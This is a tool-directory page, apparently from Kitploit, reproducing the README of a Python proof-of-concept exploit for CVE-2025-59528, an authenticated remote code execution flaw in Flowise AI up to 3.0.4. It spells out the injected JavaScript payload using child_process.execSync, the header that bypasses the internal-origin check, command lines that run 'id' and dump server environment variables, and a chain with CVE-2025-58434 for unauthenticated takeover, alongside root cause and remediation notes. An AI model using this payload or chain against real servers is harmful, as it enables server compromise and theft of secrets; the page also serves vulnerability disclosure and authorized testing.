Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Flowise-RCE-CVE-2025-59528 — Python PoC exploit for CVE-2025-59528, achieving authenticated RCE on Flowise AI <= 3.0.4 via the customMCP endpoint and Node.js child_process.execSync. | Kitploit
도구/GitHubGitHub/arensballiu/flowise-rce-cve-2025-59528
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubarensballiu/flowise-rce-cve-2025-59528

Flowise-RCE-CVE-2025-59528

Python PoC exploit for CVE-2025-59528, achieving authenticated RCE on Flowise AI <= 3.0.4 via the customMCP endpoint and Node.js child_process.execSync.

저장소 보기
12111일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
요청한 언어로 콘텐츠를 사용할 수 없습니다. 영어 버전을 표시합니다.

CVE-2025-59528 - Flowise AI Authenticated Remote Code Execution (RCE)

Overview

CVE ID: CVE-2025-59528
Affected Software: Flowise AI
Vulnerable Versions: <= 3.0.4
Fixed Version: 3.0.5 and later
Severity: Critical
Author: arensballiu
Date: 2025

Description

Flowise AI versions up to and including 3.0.4 allow an authenticated user to achieve Remote Code Execution (RCE) on the host server by sending a crafted JavaScript payload to the /api/v1/node-load-method/customMCP endpoint.

The customMCP node's load method accepts user-controlled input that is evaluated server-side as JavaScript, without adequate sanitization or sandboxing. By injecting a payload that leverages Node.js's child_process.execSync, an attacker can run arbitrary operating system commands with the privileges of the Flowise server process.

The endpoint also requires the x-request-from: internal header to be present.

Affected Endpoint

EndpointMethodAuth RequiredPurpose
/api/v1/auth/loginPOSTNoAuthenticate and obtain session
/api/v1/node-load-method/customMCPPOSTYes (session cookie)Vulnerable node load method endpoint

Proof of Concept

File: CVE-2025-59528_POC.py

Requirements

  • Python 3.x
  • requests library
  • Valid credentials for any user account on the target Flowise instance
pip install requests

Usage

python3 CVE-2025-59528_POC.py -e <email> -i <target_url> -p <password> -c <command>

Arguments

FlagLong FormRequiredDescription
-e--emailYesAuthenticated user's email address
-i--urlYesBase URL of the Flowise instance
-p--passwordYesAuthenticated user's password
-c--cmdYesOS command to execute on the server

Examples

Verify code execution:

python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "id"

Retrieve server environment variables:

python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "env"

Expected Output

[+] Logged in
[+] Exploit sent
[+] Status: 200

Payload Breakdown

The exploit injects the following JavaScript expression into the mcpServerConfig field:

({x:(function(){
    const cp = process.mainModule.require('child_process');
    cp.execSync('<command>');
    return 1;
})()})
  • process.mainModule.require('child_process') - loads Node.js's built-in process execution module.
  • execSync('<command>') - synchronously runs the attacker-supplied OS command.
  • The entire expression is wrapped in an object literal to ensure it evaluates cleanly within the server's JavaScript context.

The x-request-from: internal header is also appended to the request to pass an internal origin check that would otherwise block the call.

Root Cause

The customMCP endpoint passes user-supplied input directly into a JavaScript evaluation context on the server without sanitization or sandboxing. Combined with unrestricted access to Node.js core modules (specifically child_process) via process.mainModule.require, this creates a trivially exploitable RCE vector. The x-request-from header check provides no meaningful security boundary as it is not validated against any trusted source.

Chaining with CVE-2025-58434

These two vulnerabilities can be chained for an unauthenticated RCE attack path against Flowise instances running versions <= 3.0.4:

  1. Use CVE-2025-58434 to reset the password of any known account (no prior authentication needed).
  2. Log in with the newly set credentials.
  3. Use CVE-2025-59528 to execute arbitrary OS commands on the server.

Remediation

  • Upgrade to Flowise AI 3.0.5 or later, which removes or properly sandboxes the vulnerable evaluation path.
  • Never evaluate user-controlled strings as code in a server-side context.
  • Restrict access to dangerous Node.js modules (child_process, fs, etc.) via a proper sandbox (e.g., vm2, isolated contexts, or removing process.mainModule access).
  • Validate and authenticate the x-request-from header through a server-side mechanism rather than a simple string check.
  • Apply the principle of least privilege to the Flowise server process.

Disclaimer

This proof of concept is provided for educational and authorized security research purposes only. Use of this script against systems without explicit written permission is illegal and unethical. The author and contributors assume no liability for misuse.

도구 다운로드